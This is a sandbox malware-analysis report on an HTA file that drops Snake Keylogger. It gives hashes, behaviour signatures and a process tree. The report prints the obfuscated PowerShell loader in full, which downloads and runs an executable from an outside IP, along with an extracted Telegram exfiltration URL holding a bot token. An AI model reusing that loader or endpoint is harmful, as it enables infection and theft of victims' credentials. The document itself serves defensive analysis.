Analysis
-
max time kernel
143s -
max time network
205s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
16/10/2024, 01:40
Static task
static1
Behavioral task
behavioral1
Sample
16102024_0140_niceworkingprojectforeveryone.hta
Resource
win7-20240729-en
Behavioral task
behavioral2
Sample
16102024_0140_niceworkingprojectforeveryone.hta
Resource
win10v2004-20241007-en
General
-
Target
16102024_0140_niceworkingprojectforeveryone.hta
-
Size
165KB
-
MD5
44ad3c49b38f4f6f1739baf86d528fd3
-
SHA1
afcf27df0ee2373846a1f6b8027e9cfcea77c486
-
SHA256
4e7237c56ca769460022e46e7585b630f9918be1cf427c180facd3edd22e6368
-
SHA512
e2846bdafad1f3f2901171d3e3ca5744cd934ec6231bcef14327e17a8ac2aa225e254d25e1abca4a3465994979fa480b8f8a90be21754bb7a8f457d68102f691
-
SSDEEP
96:Ea+n7bJh/qUh/qoR3hH+TJoAj/h/q9+SAT:Ea+7bJ5/pLA78WT
Malware Config
Extracted
snakekeylogger
https://api.telegram.org/bot7913958792:AAFOhfKo5L7M50XG6odxxQQwJAeD3zGEuJU/sendMessage?chat_id=7004340450
Signatures
-
Snake Keylogger
Keylogger and Infostealer first seen in November 2020.
-
Snake Keylogger payload 1 IoCs
resource yara_rule behavioral2/memory/1148-92-0x0000000000400000-0x0000000000426000-memory.dmp family_snakekeylogger -
Blocklisted process makes network request 1 IoCs
flow pid Process 18 3172 PoweRsHELl.ExE -
Downloads MZ/PE file
-
Evasion via Device Credential Deployment 2 IoCs
pid Process 3172 PoweRsHELl.ExE 4168 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation mshta.exe -
Executes dropped EXE 1 IoCs
pid Process 2364 taskhostw.exe -
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key opened \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key opened \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 20 checkip.dyndns.org -
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral2/files/0x0008000000023c8a-76.dat autoit_exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2364 set thread context of 1148 2364 taskhostw.exe 99 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 536 2364 WerFault.exe 98 -
System Location Discovery: System Language Discovery 1 TTPs 7 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskhostw.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegSvcs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PoweRsHELl.ExE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 3172 PoweRsHELl.ExE 3172 PoweRsHELl.ExE 4168 powershell.exe 4168 powershell.exe 1148 RegSvcs.exe 1148 RegSvcs.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 2364 taskhostw.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 3172 PoweRsHELl.ExE Token: SeDebugPrivilege 4168 powershell.exe Token: SeDebugPrivilege 1148 RegSvcs.exe -
Suspicious use of WriteProcessMemory 19 IoCs
description pid Process procid_target PID 4228 wrote to memory of 3172 4228 mshta.exe 86 PID 4228 wrote to memory of 3172 4228 mshta.exe 86 PID 4228 wrote to memory of 3172 4228 mshta.exe 86 PID 3172 wrote to memory of 4168 3172 PoweRsHELl.ExE 89 PID 3172 wrote to memory of 4168 3172 PoweRsHELl.ExE 89 PID 3172 wrote to memory of 4168 3172 PoweRsHELl.ExE 89 PID 3172 wrote to memory of 4044 3172 PoweRsHELl.ExE 94 PID 3172 wrote to memory of 4044 3172 PoweRsHELl.ExE 94 PID 3172 wrote to memory of 4044 3172 PoweRsHELl.ExE 94 PID 4044 wrote to memory of 3636 4044 csc.exe 95 PID 4044 wrote to memory of 3636 4044 csc.exe 95 PID 4044 wrote to memory of 3636 4044 csc.exe 95 PID 3172 wrote to memory of 2364 3172 PoweRsHELl.ExE 98 PID 3172 wrote to memory of 2364 3172 PoweRsHELl.ExE 98 PID 3172 wrote to memory of 2364 3172 PoweRsHELl.ExE 98 PID 2364 wrote to memory of 1148 2364 taskhostw.exe 99 PID 2364 wrote to memory of 1148 2364 taskhostw.exe 99 PID 2364 wrote to memory of 1148 2364 taskhostw.exe 99 PID 2364 wrote to memory of 1148 2364 taskhostw.exe 99 -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\16102024_0140_niceworkingprojectforeveryone.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4228 -
C:\Windows\SysWOW64\wINDowSPoweRSHell\V1.0\PoweRsHELl.ExE"C:\Windows\sysTeM32\wINDowSPoweRSHell\V1.0\PoweRsHELl.ExE" "pOwerSHelL -ex bYPAss -NOP -w 1 -c deVICECreDENtIALDEpLoyMeNt ; IeX($(IEx('[sySTeM.tExt.EncOdInG]'+[cHaR]0x3a+[CHAR]58+'UTf8.geTstrINg([SySteM.coNVeRt]'+[CHar]0X3A+[Char]58+'frOmbase64striNG('+[cHar]34+'JHhzZ1dMTGJ3cHcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVtYmVSREVGSU5JdElPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTE1vbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBxR0Fnd2p0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbG9VLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYnosdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdnVEaE5SWGRkLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUmtGUlVRQWIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiS2NkY3VuVHoiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtZVNwQWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiTE1URWdJVnBORyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJHhzZ1dMTGJ3cHc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy4yNS8yNzAvdGFza2hvc3R3LmV4ZSIsIiRFTlY6QVBQREFUQVx0YXNraG9zdHcuZXhlIiwwLDApO1N0YVJ0LVNMRUVwKDMpO1NUYXJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHRhc2tob3N0dy5leGUi'+[CHAR]0x22+'))')))"2⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3172 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex bYPAss -NOP -w 1 -c deVICECreDENtIALDEpLoyMeNt3⤵
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4168
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\dq3dlhag\dq3dlhag.cmdline"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4044 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9069.tmp" "c:\Users\Admin\AppData\Local\Temp\dq3dlhag\CSCB35195D17B1A407FB26BE3F434266FBE.TMP"4⤵
- System Location Discovery: System Language Discovery
PID:3636
-
-
-
C:\Users\Admin\AppData\Roaming\taskhostw.exe"C:\Users\Admin\AppData\Roaming\taskhostw.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:2364 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Users\Admin\AppData\Roaming\taskhostw.exe"4⤵
- Accesses Microsoft Outlook profiles
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:1148
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2364 -s 7444⤵
- Program crash
PID:536
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 2364 -ip 23641⤵PID:3232
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD53d086a433708053f9bf9523e1d87a4e8
SHA1b3ab5d4f282a4c8fe8c3005b8a557ed5a0e37f28
SHA2566f8fd1b8d9788ad54eaeee329232187e24b7b43393a01aeba2d6e9675231fb69
SHA512931ae42b4c68a4507ff2342332b08eb407050d47cf4176137ea022d0f6e513c689e998445a04c6d18d4877391705c586bfce0234632b898d41aaed0957996dfd
-
Filesize
18KB
MD593aff0527ee852bd4f2758ff570a5bdd
SHA1b2c2ec10c6e4227c42772d08246bfcc3054a707f
SHA25663b2bd55be9abfbacc3e3de76d85d65fbbcb603662511d8cc27ad67fadc8c843
SHA512b4be0c3b80c46f6c9c63748ac4e6c76e4853c4093cd201f6844560e05784386728c12fbde7a9f800ef147d7e715ac770b2cf98fb952ccfd3ee9a03bfba8568e9
-
Filesize
1KB
MD56477e6f0f98432e7062a98ae035d719d
SHA16f7f283a5edd8f65defd87d05df5a0bb4fdc1648
SHA256ab3de7f0a290228a77605b599c4843c227a30c08e4b84ac3e604ee46cfa38d57
SHA5129a69ba9a3fb093cccc63b47f68353efb11e9c65811efa3d2b704e68c7ccab99a13550cc8cb95072cf7b5df03cebdb629ac9de1404d84cd509cc01c5ab0f86def
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
3KB
MD5c5e971606b36ef8ac72ae3bcb38999a0
SHA199d16e47077b23a073c43e8af25cc34bb759d358
SHA256de910001bd7f26e9db5d21d3f374330bec8e05683d313faca2cbe00826481d14
SHA512882720d24a5f4e1fe519801b23035ca4bc3ef96ec46fd71f33a1eed870136d4a2f5be010636538831cb6fcfec9664f97c243ac4baa0c454e8d6de3b0b4ecd0ce
-
Filesize
948KB
MD53e2f27edd3deacd8f08f6ed1133b2040
SHA1060e3218949c5a006bb8607e8228e6539b737bfb
SHA256163a25e2b68ed09eb4cf82f28c87568969091764bdfb4140b4675a00e2d2ed86
SHA512da437c39e3337f6750c3b9353c71999c16415ec1fecdaa4bba676bb12207cb51a7258b91b175d1893ae4e9111fa9ccf027151ad7527d9d78df59f86436cfdb42
-
Filesize
652B
MD53fe6ab35aa55017b445a67534b2aba81
SHA12b7a1729f880cf517f3e8a3d753c42f1496daaa7
SHA256c80c593e93bf178016d47d1307b1584889fe9328429ae69453fdea9076272db9
SHA5129178bd18bb93be708c5608dcc0ad0950d3ed143c9b41db091789464c6c2f132c0c9965bfa3826f49fbee332ae60e40048ff5a0ce0190c437f4f03d0a4e008900
-
Filesize
475B
MD5ecc2c10cb4c5954e2d5156bce54e41f4
SHA12d7cde31f9942c1dc80c493c03d675962991bf31
SHA25621d7b2d886e9a8c3cf70d60b612151ecf35df156524dda00bc5f0c14df45b3ac
SHA512bfce3f87e8f97f1a8f149c7f3e172e312019a4189fd1e33bdb7d2c617c6bbf41f548e91c12f71b5e8215397138ea643430f0ee87d72b33760c0dd2e3b8ae4d96
-
Filesize
369B
MD5ce2ca4fde56c4f762eb195764e196332
SHA18beb6a3d549463ede47c2733af27229db814fdbd
SHA25606fcbc079c63dde058bfe8c2cc733ac1f86aa4b0cfdc9864868016c4edeb57c7
SHA51284f68ec0bf8ed38257a40e2f4bafec8dff9ab332568f36cf4b97fed7c5a771260de879dfeafc723f3aeb91e0e08d3d549da4bc963b2e911665d1c6a112ea820e